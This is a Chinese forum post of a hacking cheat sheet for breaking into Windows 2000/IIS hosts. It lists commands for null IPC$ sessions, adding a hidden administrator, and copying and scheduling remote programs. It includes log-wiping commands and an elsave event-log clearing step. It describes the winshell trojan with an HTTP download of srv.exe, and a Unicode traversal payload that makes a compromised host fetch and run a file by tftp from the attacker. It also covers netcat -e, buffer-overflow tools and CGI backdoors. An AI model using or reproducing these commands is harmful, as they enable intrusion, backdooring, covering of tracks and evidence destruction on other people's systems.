<P><FONT color=#0000ff>网管和黑客都必须知道的命令</FONT></P><P>===================================================== <BR> (与远程主机建立空管连接) net use <A target=_blank href="file://IP/" target=_blank>\\IP</A>地址\ipc$ "" /use:"" <BR> (以管理员身份登录远程主机) net use <A target=_blank href="file://IP/" target=_blank>\\IP</A>地址\ipc$ "密码" /use:"Administrator" <BR> (传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 <A target=_blank href="file://IP/" target=_blank>\\IP</A>地址\admin$ <BR> (查看远程主机时间) net time <A target=_blank href="file://IP/" target=_blank>\\IP</A>地址 <BR> (定时启动某个程序) at <A target=_blank href="file://IP/" target=_blank>\\IP</A>地址 02:18 readme.exe <BR> (查看共享) net view <A target=_blank href="file://IP/" target=_blank>\\IP</A>地址 <BR> (查看netbios工作组列表) nbtstat -A IP地址 <BR> (将远程主机C盘映射为自己的F盘) net use f: <A target=_blank href="file://IP/" target=_blank>\\IP</A>地址\c$ ""/user:"Administrator" <BR> (这两条把自己增加到管理员组): net user 用户名 密码 /add <BR> net localgroup Administrators 用户名 /add <BR> (断开连接) net use <A target=_blank href="file://IP/" target=_blank>\\IP</A>地址\ipc$ /delete <BR> ===================================================== <BR> 擦屁屁: <BR> del C:\winnt\system32\logfiles\*.* <BR> del C:\winnt\system32\config\*.evt <BR> del C:\winnt\system32\dtclog\*.* <BR> del C:\winnt\system32\*.log <BR> del C:\winnt\system32\*.txt <BR> del C:\winnt\*.txt <BR> del C:\winnt\*.log <BR> ============================ </P><P> ·其它几个命令更厉害<BR>一、netsvc.exe <BR> 下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务: <BR> netsvc /list <A target=_blank href="file://IP/" target=_blank>\\IP</A>地址 <BR> netsvc schedule <A target=_blank href="file://IP/" target=_blank>\\IP</A>地址 /query <BR> netsvc <A target=_blank href="file://IP/" target=_blank>\\IP</A>地址 schedule /start <BR> 二、OpenTelnet.exe <BR> 远程启动主机的Telnet服务,并绑定端口到7878,例如: <BR> OpenTelnet <A target=_blank href="file://IP/" target=_blank>\\IP</A>地址 用户名 密码 1 7878 <BR> 然后就可以telnet到主机的7878端口,进入DOS方式下: <BR> telnet IP地址 7878 <BR> 三、winshell.exe <BR> 一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD&gt;后,可打下面的命令: <BR> p Path (查看winshell主程序的路径信息) <BR> b reBoot (重新启动机器) <BR> d shutDown (关闭机器) <BR> s Shell (执行后你就会看到可爱的“C:\&gt;”) <BR> x eXit (退出本次登录会话,此命令并不终止winshell的运行) <BR> CMD&gt; <A target=_blank href="http://.../srv.exe" target=_blank>http://.../srv.exe</A> (通过http下载其他网站上的文件到运行winshell的机器上) <BR> 四、3389登陆器,GUI方式登录远程主机的 <BR> 五、elsave.exe <BR> 事件日志清除工具 <BR> elsave -s <A target=_blank href="file://IP/" target=_blank>\\IP</A>地址 -l "application" -C <BR> elsave -s <A target=_blank href="file://IP/" target=_blank>\\IP</A>地址 -l "system" -C <BR> elsave -s <A target=_blank href="file://IP/" target=_blank>\\IP</A>地址 -l "security" -C <BR> 执行后成功清除应用程序日志,系统日志,安全日志 <BR> 六、hbulot.exe <BR> 开启win2kserver和winxp的3389服务 <BR> hbulot [/r] <BR> 使用/r表示安装完成后自动重起目标使设置生效。 <BR> 七、nc.exe(netcat.exe) <BR> 一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。 <BR> 想要连接到某处: nc [-options] hostname port [ports] ... <BR> 绑定端口等待连接: nc -l -p port [-options] [hostname] [port] <BR> 参数: <BR> -e prog 程序重定向,一旦连接,就执行 [危险!!] <BR> -g gateway source-routing hop point, up to 8 <BR> -G num source-routing pointer: 4, 8, 12, ... <BR> -h 帮助信息 <BR> -i secs 延时的间隔 <BR> -l 监听模式,用于入站连接 <BR> -n 指定数字的IP地址,不能用hostname <BR> -o file 记录16进制的传输 <BR> -p port 本地端口号 <BR> -r 任意指定本地及远程端口 <BR> -s addr 本地源地址 <BR> -u UDP模式 <BR> -v 详细输出——用两个-v可得到更详细的内容 <BR> -w secs timeout的时间 <BR> -z 将输入输出关掉——用于扫描时 <BR> 八、TFTPD32.EXE <BR> 把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如: <BR> <A target=_blank href="http://ip/" target=_blank>http://IP</A>地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:\winnt\system32\文件名 <BR> 然后可以直接令文件运行: <BR> <A target=_blank href="http://ip/" target=_blank>http://IP</A>地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名 <BR> 九、prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。 <BR> 一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。 <BR> 一、一 Xscan命令行运行参数说明: <BR> 在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,按""强行关闭程序。 <BR> 1.命令格式: xscan -host [-]&nbsp; [其他选项] <BR> xscan -file&nbsp;&nbsp; [其他选项] <BR> 其中 含义如下: <BR> -port : 检测常用服务的端口状态(可通过\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"项定制待检测端口列表); <BR> -ftp : 检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件); <BR> -ntpass : 检测NT-Server弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件); <BR> -cgi : 检测CGI漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案); <BR> -iis : 检测IIS漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案); <BR> [其他选项] 含义如下: <BR> -v: 显示详细扫描进度 <BR> -p: 跳过Ping不通的主机 <BR> -o: 跳过没有检测到开放端口的主机 <BR> -t : 指定最大并发线程数量和并发主机数量, 默认数量为100,10 </P><p>[此帖子已被 灰儿 在 2006-10-18 20:00:11 编辑过] |
|